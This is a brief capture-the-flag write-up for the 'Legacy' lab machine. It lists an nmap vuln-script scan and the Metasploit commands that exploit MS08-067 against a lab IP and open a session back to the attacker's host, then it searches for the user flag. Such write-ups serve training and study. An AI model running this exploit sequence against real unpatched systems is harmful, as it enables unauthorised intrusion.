🦵Legacy

We start with a quick scan ->

i have these ports:

nmap -p 445 --script vuln  10.129.29.238

--script vuln: Checks for specific known vulnerabilities and generally only report results if they are found

i run msfconsole ->

search ms08-067
use 0
options
set lhost 10.10.14.166
set rhosts 10.129.29.238
exploit

there is a lot of file so let's look for the file we're interested in :

search -f user.txt
c:\Documents and Settings\john\Desktop\user.txt

and for some reason the root file was not protected by any privesc...

Last updated